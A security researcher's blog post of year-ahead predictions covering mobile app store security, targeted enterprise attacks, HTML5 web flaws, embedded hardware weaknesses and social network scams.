It’s the most wonderful time of
the year. A time when we set aside our quarrels and show compassion for
complete strangers, realize that it’s better to give than to receive and in the
security industry, let everyone know just how smart we are playing Nostradamus.
Yes, it wouldn’t be December if I didn’t join in the chorus of prognosticators
to let you know exactly what is in store for us all in the coming twelve
months.
Mobile
With WebOS now officially an
orphan, Blackberry OS racing
to the grave and Windows Mobile still trying to get ready for the party,
the victors can be crowned – iOS and Andorid have won. The interesting part of
the race is about to begin, namely who has the best security model. Will it be
Apple’s draconian, ‘we control everything’ or Google’s happy-go-lucky ‘come on
in, everyone’s invited’ approach?
Prediction: The ‘do no evil’ company will struggle mightily to keep
evil applications out of their App Marketplace. In an effort to avoid being to
mobile what Windows is to PCs (a breeding ground for malware), Google will
subtly make Android less open to both partners and developers. They will also
announce an initiative to increase security screening for applications before
deployment in the App Marketplace. Apple on the other hand will have
comparatively few malicious apps to deal with, but at least three major OS
flaws that impact all users (and make the jailbreak team happy). Apple will
address the vulnerabilities several days late and apologize to no one. iPad 3
and iPhone 5 sales will turn financial analysts into giddy schoolgirls.
Enterprise
Thanks to marketing teams across
the globe, APT (Advanced Persistent Threat) has become a meaningless buzzword
in the security lexicon. Let’s therefore ditch that term and instead focus on
targeted attacks, specifically those focused on enterprises with the goal of
corporate espionage or to inflict financial damage. Many praised Google for
coming forward in January 2010 to reveal that they and others had been the
victim of a sophisticated targeted attack, likely originating from China. Many
in the public mistakenly assumed that this was a new and previously unseen
event on the security stage. What was new about it was the openness displayed
by Google in discussing the situation, not the class of attack.
Prediction: The term ‘APT’ will go the way of ‘eCommerce’ and the
Dodo bird, but stories of targeted attacks against enterprises will rise
tenfold in the media. This will be a reflection of increased activity by
attackers as they broaden their reach to smaller companies and decisions by
corporate council to disclose details of an attack rather than to suppress the
information and risk litigation for trying to cover up such activity.
Web
Want to know a secret for making
security predictions? Take a look at what was being discussed at security
conferences 2-3 years ago. At Black Hat DC 2009, I discussed the dangers of persistent
web browser storage. One of the key technologies that will be taking
browser storage to the next level is HTML5. In 2009, HTML5 apps were few and
far between. Thanks in large part to mobile browsers; HTML5 is now much more
mainstream. As with any new technology, developers are quickly rushing to play
with the new kid on the block and publishing their goods, without taking the
time to understand the security implications.
Prediction: We’ll see an increasing number of web application
vulnerabilities in HTML5 apps, not because the technologies behind them are
insecure, but because HTML5 is not well understood from a security perspective.
Hardware
Security in the hardware space
is at least ten years behind security in the software industry. This isn’t so
much a reflection of the good work being done in software, as it is the reality
of software vendors being forced to address an issue that was impacting
business. Thanks to the efforts of many great researchers investing countless
hours doing QA work that should have been done long before products hit the
shelf, today most major security vendors have no choice but to employ security
response teams and take vulnerability disclosure very seriously.
Hardware vendors simply haven’t
faced the same scrutiny, but that’s changing. This year at Blackhat, I spoke
about the sad
state of embedded web servers and recently researchers
at Columbia University discussed the ability to remotely cause physical
damage to HP printers due to security flaws.
Prediction: Hardware vendors will get a wake-up call as researchers
shift their efforts and party like it’s 1999.
Social
The majority of malicious
activity surrounding social networks today primarily involves unwanted or
nuisance traffic as opposed to attacks that lead to a fully compromised
machine. We’re seeing an increase in likejacking
and self-inflicted
JavaScript injection attacks that have the same overall goal – drive web
traffic or prompt software downloads that can earn the scammer a few cents per
click.
Social networks such as Facebook
are of value to more serious criminals, but mainly for reconnaissance during
targeted attacks. They are a great resource for learning background information
about an individual and uncovering relationships, all of which can be of great
value for social engineering. We’re not however, commonly seeing the
communication aspects of social networks used to deliver malicious payloads
directly to victims or investments in uncovering web application
vulnerabilities used to compromise end user machines as opposed to spreading
the aforementioned scams.
Prediction: Attackers will raise the bar and leverage social
networks for more sophisticated attacks, the goal of which will be full
compromise as opposed to marketing financial scams.
Merry New Year!
- michael
Posts
No comments:
Post a Comment